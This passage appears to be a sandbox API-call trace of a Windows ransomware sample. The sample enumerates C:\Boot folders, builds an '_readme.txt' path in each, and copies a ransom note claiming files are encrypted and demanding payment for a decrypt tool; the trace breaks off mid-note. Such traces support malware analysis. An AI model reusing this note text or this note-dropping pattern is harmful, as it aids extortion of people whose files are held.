lpFileName="C:\\Boot\\hu-HU\\*" (normalized: "c:\\boot\\hu-hu\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.693] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.693] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.694] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.694] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.694] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.731] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0174.731] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.731] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.731] PathFindFileNameW (pszPath="") returned="" [0174.731] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.732] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.732] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.732] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.733] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0174.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.733] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0174.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.734] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 